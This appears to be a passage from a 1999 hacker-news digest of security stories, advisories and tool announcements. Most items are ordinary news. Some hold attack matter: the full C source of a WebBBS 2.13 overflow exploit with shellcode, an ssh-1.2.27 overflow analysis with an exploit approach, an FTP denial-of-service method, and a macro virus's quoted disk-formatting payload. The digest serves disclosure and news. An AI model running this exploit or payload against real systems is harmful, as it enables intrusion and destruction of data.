Rep. Sanford Bishop Jr. (D-Ga.) said that although NSA is facing "tremendous
challenges coping with the explosive development of commercial
communications and computer technology...[the agency] has not demonstrated
much prowess in coping with the challenge."
According to Bishop, a "sustained funding increase" may be necessary to fix
NSA's dwindling eavesdropping capabilities. "Action is...imperative since the
nation cannot navigate with an impaired sense of hearing," he said.
@HWA
43.0 CSIS Lost Classified Floppy Disk
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I love this, it sure inspires confidence in our esteemed CSIS operatives
talk about a bunch of fuckups! - Ed
From HNN http://www.hackernews.com/
contributed by William Knowles
The Canadian Security Intelligence Service lost a floppy
disk containing classified information. The disk was
found in a phone booth in 1996 in downtown Toronto.
Recently it has been learned that the disk contained
information in plain text about confidential informants
and contacts, information about covert operations and
details about training exercises. (Remember your only
as secure as your weakest link, or your stupidest
employee.)
Globe and Mail
http://www.globeandmail.com/gam/National/19991118/USPYSN.html
The spy secrets in the phone booth
Shedding light on another CSIS slip-up,
man describes stumbling over 'sensitive' material
ANDREW MITROVICA and JEFF SALLOT
The Globe and Mail
Thursday, November 18, 1999
Toronto and Ottawa -- ANDREW MITROVICA
in Toronto
JEFF SALLOT
in Ottawa
A Toronto man who found a Canadian Security Intelligence Service computer
diskette in a telephone booth says it detailed -- in plain English -- the
names of confidential informants and contacts, information about the
service's targets and covert operations in Canada and details about
espionage training exercises.
"The more I looked, the more I realized that this was very, very,
sensitive stuff," the man told The Globe and Mail yesterday in his first
interview about the diskette mishap, which took place in 1996. "This is
amazing, I thought."
Federal government sources confirmed many details of the man's account.
The sources said the diskette was lost by a CSIS intelligence officer who
was moving from headquarters in Ottawa to a new position in Toronto.
Although its loss was reported in the media at the time, the man's
comments provide the first details of the information the diskette
contained.
The new revelations are likely to become the latest embarrassment for
Canada's embattled spy agency, which has already been rocked by news that
top-secret documents were in a briefcase stolen from an agent's minivan in
Toronto last month.
The man who found the diskette in 1996 admitted he considered selling it
to the "highest bidder" before returning it to the agency.
"People were named; contacts that they [CSIS] had within organizations in
Bosnia and in Canada, people that were in training, covert operations," he
said. "They were talking about largely unofficial, undercover contacts and
people that they were observing," he said.
He eventually returned the diskette to CSIS because he thought it was his
duty, he said. But the episode "shattered my illusions about what a secret
service operates like. I was doing what I felt was the responsible thing
to do."
The incident was later investigated by the Security Intelligence Review
Committee, an independent watchdog panel. The committee was satisfied that
the classified material hadn't fallen into the hands of anyone who could
have used it to harm national security.
Nevertheless, the case caused changes in CSIS's internal procedures for
transferring sensitive data from one location to another, the federal
sources said.
The finder of the diskette, who asked not to be identified for fear of
reprisal, recounted his brief foray into the shadowy world of espionage.
It began in early August, 1996, when he stopped to make a phone call at
the busy Toronto intersection of Yonge Street and Lawrence Avenue.
"I went into one of the phone booths to make a call and there was a
diskette on the shelf. It was just the diskette; there was nothing else.
It had obviously fallen out of something because there were quite
substantial scratch marks on it," he recalled.
He looked around for the owner. The library near the phone booth was
closed, so he posted a note on the doors, saying: "Disk found, please call
. . ."
He went home and waited for a reply. Curious, he shoved the unmarked
diskette into his computer.
"I thought, 'Maybe there is something in here that identifies who this
belongs to,' " the man said.
He opened the document using his computer's word-processing software and
was shocked by what popped up on his screen.
"It came up without any conversion. It just opened right up; it wasn't
password protected and [as] I started scanning through this stuff there
was a large quantity of clearly sensitive information. Quite frankly, I
thought at first it was just an elaborate practical joke. It was a whole
bunch of cloak-and-dagger stuff."
He kept reading the uncoded documents. There were between eight and 12 in
total, each about four pages in length. He only read three or four
documents, he said.
He said he considered selling the diskette to one of CSIS's targets, who
was identified in the documents.
"I briefly toyed with the possibility of seeing who would buy this for the
highest bid. I do know there were names there, and I thought, 'Hey, what
if I give this person a call and say: Do you know what CSIS has on you?' I
abandoned the idea. I figured I could get myself in a lot of trouble that
way."
He tried to make a copy of the diskette but realized that the information
had not been transferred.
In mid-August, he picked up the phone and called CSIS in Toronto.
"I didn't know who CSIS was. So I just looked them up in the phone book
and I called them up."
He described his find to a CSIS officer. A few hours later, H. N. (Harry)
Southern, the agency's head of internal security, arrived at the man's
home office in downtown Toronto.
The following day, CSIS called back and said they wanted to pay him
another visit. This time, two agents dropped by: Angela Jones and Mr.
Southern.
They began to question him about "everything I knew about this," he said.
CSIS knew that he had told friends about his diskette adventure.
"They asked me: 'Did you make any copies of it?' and I said that I didn't
make any printouts but I had made a copy of the diskette, but when I tried
to open it, I couldn't read it. They took my word on it and never asked me
for the copy," the man recalled.
The agents asked him not to tell anyone about the lost diskette.
"They were extremely uncomfortable. They were very ill at ease, very
embarrassed. It's an organization that's supposed to be top secret. And I
think it was uncomfortable for them to go to a Joe on the street like me
and ask him how he managed to just find in a phone booth these kind of
documents," he said.
The pair of agents paid him a third visit after they learned that he knew
a journalist who worked in Toronto for The Christian Science Monitor
newspaper. The same agents later paid a visit to the journalist and his
wife and peppered them with questions about what they knew about what was
on the diskette.
He said the agents told him they were getting a lot of heat from their
spymasters, who were anxious that his find not hit the front pages of
newspapers in Canada.
The man, who works as an administrator in Toronto, asked the CSIS agents
for money in return for his silence. They refused.
He had some harsh words for the agency.
"I told them if things are as unprofessional as they seem, maybe it would
good if a little heat was put under some people. They said: 'Believe me,
there is some heat being put under some people,' " he said.
He was not threatened. "They were very meek," he said.
Former CSIS officer Peter Marwitz said the case of the missing diskette is
known widely within the service and is a sore point for many veteran
officers who think carelessness on this scale should have been a firing
offence.
The veterans, Mr. Marwitz said recently, believe the careless officer in
the 1996 incident went unpunished because "she brazenly defied her
challenger, reminding the service that she was a woman and a minority."
The SIRC, the watchdog committee that reports to Parliament, made an
oblique reference to the 1996 incident in one of its published audits.
Procedures were changed after the incident so that an officer moving from
headquarters to a regional office isn't required to carry data physically
on computer diskettes, federal sources said.
Officers can now transfer their computer network data accounts to the new
location and sign on to the network and get access to any of the files
they are authorized to see, the sources said.
CSIS spokesman Dan Lambert said the service will neither confirm nor deny
details of the lost-diskette episode. He said an internal investigation is
still under way in the case of the employee who lost the operational
planning document while at the hockey game.
Meanwhile, Solicitor-General Lawrence MacAulay, the federal minister
responsible for both CSIS and the RCMP, confirmed that the Mounties lost a
briefcase containing sensitive documents in British Columbia in 1995.
But he said RCMP Commissioner Philip Murray assured him that the loss did
not pose a threat to national security.
Opposition parties blasted Mr. MacAulay for the third day running
yesterday for his failure to immediately notify the SIRC, the review
committee, upon learning of the incident at the hockey game.
"People . . . need to know that these departments are not leaking like
sieves," Reform MP Jim Abbott said.
@HWA
44.0 Hitachi Chip May Prevent Use of Third-party Printer Cartridges
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
New technology being developed by Hitachi may prevent
people from using third party printer cartridges. By
embedding chips similar to those in hotel keys or smart
cards into toner or ink cartridges Hitachi could prevent
customers from using third-party cartridges. Hitachi is
planning on incorporating this technology into laser
printers and copiers it markets in Japan and is currently
in negotiations with several US companies to license the
technology.
PC World
http://www.pcworld.com/pcwtoday/article/0,1510,13897,00.html
Smart Cards May Secure
Peripherals
Hitachi previews chips that could ID pirated music
or third-party printer cartridges.
by Martyn Williams, IDG News Service
November 18, 1999, 1:30 p.m. PT
LAS VEGAS -- Hitachi Maxell is previewing at Comdex
here a prototype chip being eyed by laser printer and
copier makers as a way to stop customers from using
third-party toner cartridges.
The new chip is a development of proximity smart
cards already on the market. Smart cards are widely
used in applications like hotel door keys and telephone
cards, and can exchange data when brought within a
few millimeters of a reader.
At just 2.3 mm square, the chips greatly cut down on
the space needed for the devices that use them.
The chip supports a 32-bit key and may also find its
way into an antipiracy device to protect CD- or
DVD-based media. If a disk lacked the chip, the player
would refuse to accept it.
Hitachi already plans to build card readers into the
laser printers and copiers it markets in Japan. With the
chips embedded into toner cartridges, printers can
reject cartridges that don't carry the chip. This could kill
the third-party toner business in Japan, but it's not
clear whether U.S. law would permit the same tactic,
says Masaaki Chino, manager of Hitachi Maxell's
smart card projects.
"If they include this reader board into the copy machine
and this chip into the cartridge, they can control which
cartridges are used," Chino says.
Nevertheless, Hitachi is already talking to several major
U.S. vendors regarding the technology, although Chino
declined to name them. Hitachi supplies laser printer
and copier engines to NEC, Brother, and Minolta.
At Comdex, Hitachi is also showing an application in
which the chips are loaded with a URL and embedded
into vendors' promotional material. When the brochures
are near a dedicated reader for personal computers, the
company's Web site appears inside the browser
running on the PC.
The current implementation, which requires a
stand-alone reader, is a little clunky, Chino
acknowledges. But Hitachi is talking with several PC
vendors, including Sharp, about building the readers
into computers.
@HWA
45.0 NEW MACRO VIRUS OUT THERE
~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Saturday 20th November 1999 on 2:13 pm CET
Anti-virus researchers at Network Associates Inc. said Friday that
10 Fortune 500 companies on three continents have been hit with a
new virus called W97/Prilissa. Prilissa is a nasty variant on two
better known attacks -- the Melissa worm and the PRI virus. The
virus depends on the Windows 95 and 98 operating systems and the
Word 97 word processing application.
Link: NAI
http://vil.nai.com/vil/vm10441.asp
Virus Name W97M/Prilissa
Date Added 11/17/99
Virus Characteristics This is a virus for Word 97 documents. It is able to
replicate under the SR-1 release of Word 97. It will turn off the macro
warning feature of Word 97. This virus uses the "ThisDocument" stream, or
class module, of a document or template during infection routine. It is a
copy-cat of the W97M/Melissa.a virus and there is a payload to send the
infected file via MS Outlook. Another payload exists for this virus which
is date activated - December 25th - to reformat the hard drive (on Windows
9x systems) and also overlay the active document with random shapes. Due to
this overlay activation which is a copied technique of the W97M/Pri virus,
the name is a combination of W97M/Melissa and W97M/Pri, hence
W97M/Prilissa.
This virus hooks the system event of opening documents in Word97 by the
subroutine "Document_Open" thereby running its code. Another system event
hooked is the closing of documents due to the subroutine "Document_Close"
in the global template after infection.
This virus checks for the existence of a registry key, a self-check to
verify if the local system has already been infected. The key is:
"HKEY_CURRENT_USER\Software\Microsoft\Office\" "CyberNET"="(C)1999 -
Indonesia by AnomOke!"
If this key is not found, the virus code uses VBA instructions to create a
MS Outlook email message with the subject line "Message From " (Office97
UserName) and a message body of "This document is very Important and you've
GOT to read this !!!". The first 50 listings from all available address
books are selected as the recipient - the message is then sent with an
attachment of the infected document. Lastly, the virus code creates the
registry key.
If this key does exist, the email propagation is not repeated.
If the date is December 25th (any year), the virus runs a destructive
payload to overwrite the existing C:\AUTOEXEC.BAT file with the following
instructions: "@echo off" "@echo Vine...Vide...Vice...Moslem Power Never
End..." "@echo Your Computer Have Just Been Terminated By -= CyberNET =-
Virus !!!" "ctty nul" "format c: /autotest /q /u"
Since the AUTOEXEC.BAT is not used on Windows NT, this payload is not
applicable to that operating system. The next reboot of the computer will
run the AUTOEXEC.BAT file causing an unconditional automated format of the
hard drive.
Also, a message box is displayed within Word97 with the following text:
(C) 1999 - CyberNET Vine... Vide... Vice...Moslem Power Never End... You
Dare Rise Against Me... The Human Era is Over, The CyberNET Era Has Come!!!
[OK]
After clicking on the OK dialogue box, a random number of randomly colored
and random size and type objects fill the document as an overlay. Another
virus which uses this overlay is the W97M/Pri virus.
Indications Of Infection Macro warning if opening infected document,
increase in size to global template. Messages on screen as mentioned above.
Email propagation as mentioned above.
Method Of Infection Opening infected documents will infect global template
normal.dot.
EXTRA Drivers VirusScan 4 with the 4.0.25 engine (and above) download here
Dr. Solomon's AVTK 7.99 and above download here VirusScan 3 with the 3.2.2
engine download here
Virus Information
Discovery Date: 11/17/99
Type: Macro
Risk Assessment: Medium On Watch
Minimum DAT: 4054 (Avalable 12/2/99)
Variants Several
Aliases
W97M/Melissa.w, Melissa.w, W97M/Prilissa, W97M/Pri.q, WM97/Melissa-ag,
Melissa
@HWA
46.0 GLOBALNET, CROATIAN ISP COMPROMISED
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Thursday 18th November 1999 on 3:13 pm CET
Second largest Croatian ISP - Globalnet, was penetrated yesterday
evening, and the main site was changed. Defacement and the link
lead to Croatian web pages.
Link: Monitor
http://security.monitor.hr
@HWA
47.0 SEC FILES CHARGES
~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Thursday 18th November 1999 on 3:05 pm CET
A Denver-based software company misrepresented the capabilities
of its software intended to fix Year 2000 computer problems and filed
false earnings claims, according to a suit filed by the Securities and
Exchange Commission against the firm and three of its executives.
Link: News.com
http://news.cnet.com/news/0-1009-200-1451624.html?tag=st.ne.1009.thed.1009-200-1451624
SEC files suit against Y2K toolmaker
By Erich Luening
Staff Writer, CNET News.com
November 17, 1999, 6:55 a.m. PT
A Denver-based software company misrepresented the capabilities of its
software intended to fix Year 2000 computer problems and filed false
earnings claims, according to a suit filed by the Securities and Exchange
Commission against the firm and three of its executives.
The suit, believed to be the first to charge that a software maker
overstated the capabilities of a Year 2000 repair tool, alleges that from
1997 through 1999, Accelr8, its chief executive Thomas Geimer, president
Harry Fleury and controller James Godkin made false claims about the
utility of its Navig8 2000 software, Reuters reported.
The executives are also accused of submitting false financial reports to
the SEC during a one-year period that ended April 1999, according to the
suit filed in federal court in Denver.
The SEC's action seeks an injunction against future violations of the
reporting and anti-fraud provision of the federal securities law.
The SEC alleges Navig8 2000 was created to analyze computer programs only
for the VAX/VMS computer system made by Digital Equipment, which was
bought by Compaq Computer in 1998. The company claimed the software
addressed Y2K issues for IBM and Microsoft products as well, according to
the suit. The company's lawyers dispute the charges, saying Accelr8 has
always properly represented the capabilities of its products and feels its
accounting practices are appropriate.
"We have a dispute with the SEC about the proper application of accounting
standards," Simon Krauss, Accelr8's corporate counsel, said in a
statement. "Our auditors and a former SEC accounting expert hired by us as
a consultant have concurred in the reasonableness of our accounting
decisions. Unfortunately, the SEC has the power to claim that anyone with
whom they disagree has committed fraud, and has done so in this case."
No trial date has been set.
@HWA
48.0 G6 FTP SERVER v2.0 PROBLEMS
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 6:31 pm CET
UssrLabs found a Local/Remote DoS Attack in G6 FTP Server v2.0
(beta 4/5). The buffer overflow is caused by a long user name with
2000 characters. G6FTP start to do infinites loops in the main
program,and start eating ll memory and all computer resources.
Link: UssrLabs
http://www.ussrback.com/g6ftp/
beta 4/5 Vulnerability
G6 FTP Server v2.0
PROBLEM
UssrLabs found a Local/Remote DoS Attack in G6 FTP Server v2.0 (beta 4/5),
The buffer overflow is caused by a long user name, 2000 characters.,The G6FTP
start to do infinites loops in the main program,and start eating all memory
and all computer resource CPU 100%, at the moment of no more memory, if this
happened ALL System is down :(
Example:
[gimmemore@itsme]$ telnet example.com 21
Trying example.com...
Connected to example.com.
Escape character is '^]'.
220-G6 FTP Server v2.0 (beta 5) ready ...
USER {buffer)
Where buffer is 2000 characters.
Vendor Status: Not Contacted
Vendor Url: http://www.gene6.com/
Program Url: http://www.gene6.com/g6ftpd/download.html
Credit: USSRLABS
SOLUTION: Nothing yet.
u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h
@HWA
49.0 RED HAT SECURITY ADVISORY
~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 6:22 pm CET
The length of a path name was not checked on the removal of a
directory. If a long enough directory name was created, the buffer
holding the pathname would overflow, and the possibility exists that
arbitrary code could be executed as the user the NFS server runs as
(root). Exploiting this buffer overflow does require read/write access
to a share on an affected server
Link: Security Focus
http://www.securityfocus.com
@HWA
50.0 HPING
~~~~~
From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 6:00 pm CET
Hping is a software to do TCP/IP stack auditing, to uncover firewall
policy, to scan TCP port in a lot of different modes, to transfer files
accross a firewall, test network performance, test of TOS is handled,
etc.
Link: Antirez
http://www.kyuzz.org/antirez/hping2.html
@HWA
51.0 RPM UPDATE HELPING UTILITY
~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 6:17 pm CET
Rhupdmgr is a script which sends an email to the sysadmins when
a machine has fallen out of sync with the RedHat Updates. It works
by checking a generated list of RPMs to be updated.
Link: Packet Storm
http://packetstorm.securify.com/linux/admin/rhupdmgr-0.4.tar.gz
@HWA
52.0 WebBBS Ver2.13 Exploit / Shadow Penguin Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 5:56 pm CET
At the initial authorization handling of WebBBS, If the long longin
name or password has been received, this CGI overflows.. This
overflow is used to execute any instructions which are included in
the user name and password.
Link: Packet Storm
http://packetstorm.securify.com/9911-exploits/ex_webbbs.c
/*=============================================================================
WebBBS Ver2.13 Exploit
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>
#define HEAD1 \
"POST /scripts/webbbs.exe HTTP/1.1\r\n"\
"Accept: application/msword, application/vnd.ms-excel, image/gif, "\
"image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n"\
"Accept-Language: ja\r\n"\
"Content-Type: application/x-www-form-urlencoded\r\n"\
"Accept-Encoding: gzip, deflate\r\n"\
"User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)\r\n"\
"Host: 192.168.0.100\r\n"\
"Content-Length: 106\r\n"\
"Connection: Keep-Alive\r\n\r\n"\
"uid=&upw="
#define HEAD2 "&JOB=TOP&\r\nsub=+%83%8D%83O%83C%83%93+\r\n"
#define HTTP_PORT 80
#define MAXBUF 80
#define RETADR 48
#define JMPESP_1 0xff
#define JMPESP_2 0xe4
#define NOP 0x90
#define KERNEL_NAME "kernel32.dll"
unsigned char jmp_code[100]={
0x8B,0xDC,0x33,0xC0,0xB0,0x23,0xC1,0xE0,
0x10,0x66,0xB8,0x97,0xD9,0x2B,0xD8,0xFF,
0xE3,0x00
};
unsigned char exp_code[100]={
0x33,0xC0,0x50,0x50,0xB0,0x12,0x50,0x66,
0xB8,0xFF,0xFF,0x50,0xB8,0xb8,0x58,0xf5,
0xbf,0xff,0xd0,0x50,0x50,0xB8,0x2c,0x23,
0xf5,0xbf,0xff,0xd0,0x00
};
main(int argc,char *argv[])
{
SOCKET sock;
SOCKADDR_IN addr;
WSADATA wsa;
WORD wVersionRequested;
unsigned int i,kp,ip;
static unsigned char buf[MAXBUF],buf2[1000],buf3[1000],*q;
struct hostent *hs;
MEMORY_BASIC_INFORMATION meminfo;
if (argc<2){
printf("usage: %s VictimHost\n",argv[0]);
exit(1);
}
if ((void *)(kp=(unsigned int)LoadLibrary(KERNEL_NAME))==NULL){
printf("Can not find %s\n",KERNEL_NAME);
exit(1);
}
VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION));
ip=0;
for (i=0;i<meminfo.RegionSize;i++){
ip=kp+i;
if ( ( ip &0xff)==0
|| ((ip>>8 )&0xff)==0
|| ((ip>>16)&0xff)==0
|| ((ip>>24)&0xff)==0) continue;
q=(unsigned char *)ip;
if (*q==JMPESP_1 && *(q+1)==JMPESP_2) break;
}
printf("RETADR : %x\n",ip);
if (ip==0){
printf("Can not find codes which are used by exploit.\n");
exit(1);
}
wVersionRequested = MAKEWORD( 2, 0 );
if (WSAStartup(wVersionRequested , &wsa)!=0){
printf("Winsock Initialization failed.\n"); return -1;
}
if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
printf("Can not create socket.\n"); return -1;
}
addr.sin_family = AF_INET;
addr.sin_port = htons((u_short)HTTP_PORT);
if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified host.\n"); return -1;
}
addr.sin_family = hs->h_addrtype;
memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){
printf("Can not connect to specified host.\n"); return -1;
}
memset(buf,NOP,MAXBUF); buf[MAXBUF]=0;
strncpy(buf,exp_code,strlen(exp_code));
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
strncpy(buf+RETADR+4,jmp_code,strlen(jmp_code));
send(sock,HEAD1,strlen(HEAD1),0);
send(sock,buf,strlen(buf),0);
send(sock,HEAD2,strlen(HEAD2),0);
closesocket(sock);
printf("Done.\n");
return FALSE;
}
@HWA
53.0 SENATE.GOV BITES THE DUST
~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 5:14 pm CET
One of the web sites on stat.gov was defaced earlier today.
meetingout.senate.gov was hit, and the main page changed
with: "rackmount. the 19-inch warrior. now available in 1u, 2u, and
4u flavors. shouts to [sSh]. good fellaz".
Link: Attrition
http://www.attrition.org/mirror/attrition/1999/11/17/meetingout.senate.gov/
@HWA
54.0 NEW NESSUS
~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 5:09 pm CET
Nessus is a free, open-sourced and up-to-date remote security
scanner for Linux, BSD, Solaris and some other systems. It is
multithreaded, plugin-based, has a nice GTK interface and currently
performs over 270 remote security checks.
Link: The Nessus Project
http://www.nessus.org/
@HWA
55.0 DELEGATE
~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 5:04 pm CET
Delegate, a multiple-service proxy server contains several hundred
buffer overflows and is horribly insecure in general. There is a
demonstration exploit for just one remotely exploitable buffer
overflow for delegate, compiled on linux.
Link: Teso
http://teso.scene.at/
@HWA
56.0 SSH PROBLEMS
~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 4:23 pm CET
A remotely exploitable buffer overflow has been found in ssh-1.2.27.
The problem is the length of the session key is not checked.
Multiple platforms are vulnerable.
Link: Packet Storm
http://packetstorm.securify.com/9911-exploits/ssh-1.2.27.txt
-------------------------------------------------------------------
Periodically, the moderator of of the vuln-dev mailing list will post
summaries of issues discussed there to Bugtraq and possibly other relevant
lists. This will usually happen when an issue has been resolved, or it
appears that there will be no further discussion on vuln-dev. Each
separate issue will be given it's own posting to facilitate referencing
them separately, for discussion, forwarding, or appearance in vulnerability
databases.
To subscribe to vuln-dev, send an e-mail to listserv@securityfocus.com,
with SUBSCRIBE VULN-DEV in the body of the message.
A FAQ and archive can be found at www.securityfocus.com-->forums-->vuln-dev
(click on these sections, the web pages are forms-based.)
-------------------------------------------------------------------
There appears to be a serious vulnerability in ssh 1.2.27. I will let the
folks who worked on this issue describe. There was brief discussion on
vuln-dev on the politics of ssh 1 vs. ssh 2, etc... you may or may not
want to play that out on Bugtraq. One of the key points of the SSH 1 vs.
SSH 2 debate is regarding licensing. Basically, because of a less strict
license on SSH 1, more folks are likely to be running that version. (This
is all referring to the Datafellows implementation that everyone uses,
rather than standards and protocols, I presume.)
As usually, check the vuln-dev archives if you want the full story. This
isn't necessarily a dead topic there yet, but this issue should get out
there sooner rather than later.
BB
-------------------------------------------------------------------
To: Exploit-Dev
Subject: ssh-1.2.27 remote buffer overflow - exploitable
Date: Mon Nov 08 1999 16:48:53
Author: Frank
Message-ID: <19991109014853.3239.qmail@securityfocus.com>
This is submitted to the Freebsd bug tracking system, although there are
doubtless other vendors who leave this package, despite the existence of
the ssh-2.X. While Debian appears to be immune, I was able to crash my
ssh daemon (much to my dismay), and there appears the potential to execute
arbitrary code, as long as you encrypt it first...
Here is the freebsd report.. it describes the method to crash a remote Ssh
daemon (lets hope you ran sshd from your xinetd, etc).
http://www.freebsd.org/cgi/query-pr.cgi?pr=14749
-------------------------------------------------------------------
To: Exploit-Dev
Subject: Re: ssh-1.2.27 remote buffer overflow - exploitable
Date: Mon Nov 08 1999 21:04:19
Author: Daniel Jacobowitz
Message-ID: <19991109110419.A29502@drow.res.cmu.edu>
<SNIP>
Debian is immune for the (somewhat messy) reasons that they do not link
ssh to rsaref, last time that I checked.
<SNIP>
-------------------------------------------------------------------
To: Exploit-Dev
Subject: Re: ssh-1.2.27 remote buffer overflow - exploitable
Date: Mon Nov 08 1999 21:24:17
Author: Daniel Jacobowitz
Message-ID: <19991109112417.A30046@drow.res.cmu.edu>
<SNIP>
And here's a patch. Not tested, as I don't use the rsaref glue on any
machine here.
<SNIP>
Ed: Patch can be found at:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-08
&msg=19991109112417.A30046@drow.res.cmu.edu
-------------------------------------------------------------------
To: Exploit-Dev
Subject: Re: ssh-1.2.27 remote buffer overflow - exploitable
Date: Tue Nov 09 1999 04:42:16
Author: Jochen Bauer
Message-ID: <19991109124216.A28812@luna.theo2.physik.uni-stuttgart.de>
I've taken a closer look at the problem. Here's my analysis:
In sshd.c, around line 1513 the client-generated session key,
that has been encrypted with the server and host public keys,
is received from the client as a multiple precision integer.
/* Get the encrypted integer. */
mpz_init(&session_key_int);
packet_get_mp_int(&session_key_int);
The encrypted session key is then (around line 1525) passed
to rsa_private_decrypt to do the first part of the decryption,
which is either decryption using the server private key or
decryption using the host private key, depending on which key
has the larger modulus.
rsa_private_decrypt(&session_key_int, &session_key_int,
&sensitive_data.private_key);
If RSAREF is used (i.e. RSAREF is defined in the code), the
rsa_private_decrypt function in rsaglue.c (around line 162)
looks like:
void rsa_private_decrypt(MP_INT *output, MP_INT *input, RSAPrivateKey *key)
{
unsigned char input_data[MAX_RSA_MODULUS_LEN];
unsigned char output_data[MAX_RSA_MODULUS_LEN]
unsigned int input_len, output_len, input_bits;
[...]
input_bits = mpz_sizeinbase(input, 2);
input_len = (input_bits + 7) / 8;
gmp_to_rsaref(input_data, input_len, input);
[...]
}
The trouble spot is the fixed length buffer
input_data[MAX_RSA_MODULUS_LEN]. A pointer to this buffer is
passed to the conversion function gmp_to_rsaref along with a
pointer to the encrypted session key and the length (input_len)
of the encrypted session key, which may be greater than
[MAX_RSA_MODULUS_LEN]. gmp_to_rsaref (located around line 79 of
rsaglue.c) simply calls mp_linearize_msb_first(buf, len, value).
void gmp_to_rsaref(unsigned char *buf, unsigned int len, MP_INT *value)
{
mp_linearize_msb_first(buf, len, value);
}
mp_linearize_msb_first is contained in mpaux.c around line 41.
The function looks like:
void mp_linearize_msb_first(unsigned char *buf, unsigned int len,
MP_INT *value)
{
unsigned int i;
MP_INT aux;
mpz_init_set(&aux, value);
for (i = len; i >= 4; i -= 4) <-------
{
unsigned long limb = mpz_get_ui(&aux);
PUT_32BIT(buf + i - 4, limb); <-------
mpz_div_2exp(&aux, &aux, 32);
}
[...]
}
There's the overflow! len is the length of the encrypted session
key, while buf is a pointer to the fixed length buffer
input_data[MAX_RSA_MODULUS_LEN] and no check wether len is
greater than MAX_RSA_MODULUS_LEN is performed. The fix should be
obvious!
About the possible exploit:
In this particular overflow, the encrypted, client generated session
key has to be taken as the exploit buffer. I.e. the shellcode, NOPs
and jump address has to sent to the server instead of the encrypted
session key. To make that clear: The shellcode, NOPs and jump address
don't have to be encrypted as they are taken as the ENCRYPTED session
key.
However, the data that is finally written into the buffer are the
limbs of the multiple precision integer that session_key_int is
assumed to be. The exploit buffer code therefore must be converted
into a multiple precision integer, which upon extraction of the limbs
into the buffer yields the correct exploit buffer code. The best way
would probably be to start from the exploit buffer as it should finally
be to overflow the target buffer and use the functions of the GNU
multiple precision integer library to reverse the procedure happening
to the encrypted session key in the sshd code step be step, leading to
the exploit buffer that has to be sent instead of the encrypted session
key.
That may be difficult, be it think it's possible.
@HWA
57.0 TORVALDS: COUPLE OF QUESTIONS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
by BHZ Thursday 18th November 1999 on 2:59 pm CET
No one knows more about the Linux operating system than its
creator, Linus Torvalds, and the founder of the largest Linux
company, Bob Young of Red Hat. Michael Martinez tracked them
down at Comdex and asked them few questions.
Link: ABC
http://abcnews.go.com/sections/tech/DailyNews/comdexqa991116.html
Linux Q&A
Linus Torvalds and Bob Young Answer Your Questions
By Michael Martinez
ABCNEWS.com
L A S V E G A S � No one knows more about
the Linux operating system than its creator,
Linus Torvalds, and the founder of the largest
Linux company, Bob Young of Red Hat. So I
tracked them down at Comdex and asked them
to answer your questions for you.
Q U E S T I O N: How are you planning to prevent the
�Big Guys� (IBM, Hewlett-Packard, Compaq/DEC, Sun)
from adding their own features to Linux and causing
incompatibilities among different vendors� products?
� Doug MacDonald
A N S W E R: �I really don�t think there�s a problem
there,� says Linux creator Torvalds. �A lot of these
so-called big guys in particular have been burned by
operating systems in the past. Just look at what happen to
(IBM�s) OS/2. Nobody wants to touch operating
systems. Everybody is so damned happy that somebody
else is doing it!
�Everyone that I�ve worked with has been very open
with what they are doing with regard to Linux,� Torvalds
says. �They aren�t really even trying to be very aggressive
with the kernel [the core of the OS which Torvalds
oversees, which is essentially the same in all forms of
Linux]. The kernel is kind of scary to mess around with,
and there just aren�t many developers willing to do it.
We�ve seen Linux users grow from 1,000 to 10 million,
but the number of people working on the kernel has
grown from maybe 100 to 200.
�And remember, the license prevents them from going
too far. Everything they do has to be open source. Any
competitor can then come along and grab that code and
add it to their version of the system.�
Q U E S T I O N: Linux seems well-suited for server use,
where knowledge of the system is necessary to get the
best out of it. But the newest influx of users, including
myself, wants a new option for the desktop. So far, my
experiences have been very disappointing. What can be
done to move to a mainstream desktop platform that
takes the guesswork out of installing an application?
� Rick Tillery
A N S W E R: �Your reader is obviously right because,
fundamentally, nobody actually buys operating systems,�
Red Hat founder Bob Young says. �People choose the
applications they need, then choose the operating system.
